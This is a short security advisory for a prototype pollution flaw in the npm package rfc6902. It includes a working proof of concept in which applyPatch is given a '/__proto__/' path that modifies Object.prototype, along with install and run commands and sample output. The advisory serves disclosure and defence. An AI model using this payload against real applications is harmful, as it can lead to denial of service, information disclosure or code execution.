rfc6902

vulnerability prototype pollution
severity 7.3
language typescript
registry npm

Description

rfc6902 is vulnerable to Prototype Pollution. This package allowing for modification of prototype behavior, which may result in Information Disclosure/DoS/RCE.

Proof of Concept

  1. Create the following PoC file:
// poc.js
var rfc6902 = require("rfc6902")
var obj = {}
console.log("Before : " + {}.polluted);
rfc6902.applyPatch(obj, [{ op: 'add', path: "/__proto__/polluted", value: "Yes! Its Polluted"}]);
console.log("After : " + {}.polluted);
  1. Execute the following commands in another terminal:
npm i rfc6902 # Install affected module
node poc.js #  Run the PoC
  1. Check the Output:
Before : undefined
After : Yes! Its Polluted